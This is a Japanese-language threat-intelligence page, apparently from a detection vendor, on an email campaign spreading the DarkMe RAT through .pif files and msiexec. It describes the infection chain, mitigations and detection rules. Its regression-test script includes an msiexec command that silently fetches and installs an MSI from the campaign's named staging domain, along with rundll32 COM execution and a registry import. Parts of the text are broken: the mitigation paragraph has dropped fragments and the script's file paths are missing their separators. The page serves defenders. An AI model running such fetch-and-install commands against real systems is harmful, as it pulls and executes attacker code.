SOC Prime Bias: High

25 Sep 2026 08:20 UTC

DarkMeメールキャンペーンがAPT RAT攻撃でターゲティングを拡大

Author Photo
SOC Prime Team linkedin icon フォローする
DarkMeメールキャンペーンがAPT RAT攻撃でターゲティングを拡大
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

概要

社会工学を利用した新しいキャンペーンが観察されています。これはソフトウェアの脆弱性ではなく、DarkMeスパイRATを配信しています。攻撃者はメールを通じて .pif ファイルを配布し、MSIEXECとVB6ベースの複数のロードを含む多段感染チェーンを開始します。ゼロデイの悪用から高ボリュームの社会工学への移行は、より安価で広範囲で選択性の低い攻撃手法へのシフトを示しています。

調査

Huntressは、Windows Installerを起動してリモートMSIパッケージを取得するという .pif ファイルを検出した後、このキャンペーンを特定しました。分析により、 prnfig.wsfという名前のステージングスクリプト、レジストリインポート、及び rundll32.exe /staを通じたCOMオブジェクトの実行を含む複雑な多段チェーンが明らかになりました。最終段階では、プロセスホローイングを使用して署名されたMicrosoftのバイナリ clspack.exe.

にDarkMeペイロードを注入します。

緩和策 に関連しないDLLパスなしでGUIDと共に フラグを持って起動された フラグを持って起動された を監視する必要があります。セキュリティチームはまた、 msiexec がHTTPS経由でリモートMSIパッケージを取得しているのを検出し、 .pif ファイルの実行を調査する必要があります。 %AppData% のような異常な場所から実行される署名済みMicrosoftバイナリは、追加の精査を受けるべきです。

対応策

不審な活動が検出された場合、影響を受けるエンドポイントを即座に隔離してC2通信を妨害し、データ漏洩を防ぎます。中空化された clspack.exe プロセスを終了し、 %AppData%ComponentsFolder and %AppData%Microsoftから悪意のあるアーティファクトを削除します。カスタムURLプロトコルハンドラと HKCU Run キーを通じて作成された持続化を除去します。影響を受けたユーザーの資格情報をリセットし、ローカルに保存された暗号通貨ウォレットを潜在的に侵害されたものとして扱います。

攻撃フロー

この部分はまだ更新中です。

検出

可能な持続化ポイント[ASEPs – Software/NTUSER Hive](レジストリイベント経由)

SOC Prime チーム
2026年9月24日

実行可能バイナリの異常な拡張子(プロセス作成経由)

SOC Prime チーム
2026年9月24日

LOLBAS WScript / CScript(プロセス作成経由)

SOC Prime チーム
2026年9月24日

リモートMSIファイルインストールの試行の可能性(コマンドライン経由)

SOC Prime チーム
2026年9月24日

異常なトップレベルドメイン(TLD)のDNSリクエストによる不審なコマンド&コントロール(DNS経由)

SOC Prime チーム
2026年9月24日

IOC(HashSha256)で検出:DarkMeメールキャンペーンがAPT RATのターゲットを拡大する

SOC Prime AI ルール
2026年9月24日

IOC(SourceIP)で検出:DarkMeメールキャンペーンがAPT RATのターゲットを拡大する

SOC Prime AI ルール
2026年9月24日

IOC(DestinationIP)で検出:DarkMeメールキャンペーンがAPT RATのターゲットを拡大する

SOC Prime AI ルール
2026年9月24日

DarkMe RATの通信とステージングドメインを検出する [Windows ネットワーク接続]

SOC Prime AI ルール
2026年9月24日

ダークMe RATキャンペーン活動の検出 [Windows プロセス作成]

SOC Prime AI ルール
2026年9月24日

シミュレーション実行

  • 攻撃ストーリー&コマンド: 敵対者はDarkMe RATを展開し、持続性を維持することを目指しています。署名ベースの検出を回避するため、攻撃者は msiexec を使用して侵害されたドメイン(onlineview365.com)からリモートペイロードを取得します。初期感染後、攻撃者は に関連しないDLLパスなしでGUIDと共に を使用してGUID経由で特定のCOMオブジェクトを呼び出し、メモリ内でのコード実行を行い、その後 cmd.exe を使用してテキストファイルからレジストリ構成をインポートし、環境を wscript.exe ベースのペイロード実行のために準備します。

  • リグレッションテストスクリプト:

    # DarkMe RATシミュレーションスクリプト
    # このスクリプトはSigmaルールで定義された正確なコマンドラインをシミュレートします。
    
    Write-Host "[+] DarkMe RATシミュレーションの開始..." -ForegroundColor Cyan
    
    # 1. msiexecリモートダウンロードのシミュレーション
    Write-Host "[*] msiexecリモートダウンロードをシミュレート中..."
    Start-Process msiexec.exe -ArgumentList "/i https://onlineview365.com/propi.msi /quiet /norestart" -ErrorAction SilentlyContinue
    
    # 2. rundll32 COMオブジェクト実行のシミュレーション
    Write-Host "[*] rundll32 COM実行をシミュレート中..."
    Start-Process rundll32.exe -ArgumentList "/sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B}" -ErrorAction SilentlyContinue
    
    # 3. cmd.exeレジストリインポートのシミュレーション
    Write-Host "[*] cmd.exeレジストリインポートをシミュレート中..."
    $tempFile = "$env:TEMPfiletext2.txt"
    "Windows Registry Editor Version 5.00`n[HKEY_CURRENT_USERSoftwareDarkMe]`n"Test"="Value"" | Out-File -FilePath $tempFile -Encoding ascii
    Start-Process cmd.exe -ArgumentList "/c reg.exe import ""$tempFile""" -Wait
    
    # 4. cmd/rundll32親チェーンを介したwscript.exe実行のシミュレーション
    Write-Host "[*] AppDataからのwscript.exe実行をシミュレート中..."
    $scriptPath = "$env:APPDATAmalicious_script.vbs"
    "WScript.Echo `"DarkMe Simulated`"" | Out-File -FilePath $scriptPath -Encoding ascii
    
    # 特定の親/子ルールをトリガー:
    # 親: C:WindowsSysWOW64rundll32.exe /sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B}
    # 子: wscript.exe %AppData%malicious_script.vbs
    Start-Process cmd.exe -ArgumentList "/c C:WindowsSysWOW64rundll32.exe /sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B} & wscript.exe ""$scriptPath""" -Wait
    
    Write-Host "[+] シミュレーション完了。" -ForegroundColor Green
  • クリーンアップコマンド:

    # シミュレーションアーティファクトのクリーンアップ
    Write-Host "[+] クリーンアップ中..." -ForegroundColor Yellow
    Remove-Item -Path "$env:TEMPfiletext2.txt" -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:APPDATAmalicious_script.vbs" -ErrorAction SilentlyContinue
    Write-Host "[+] クリーンアップ完了。" -ForegroundColor Green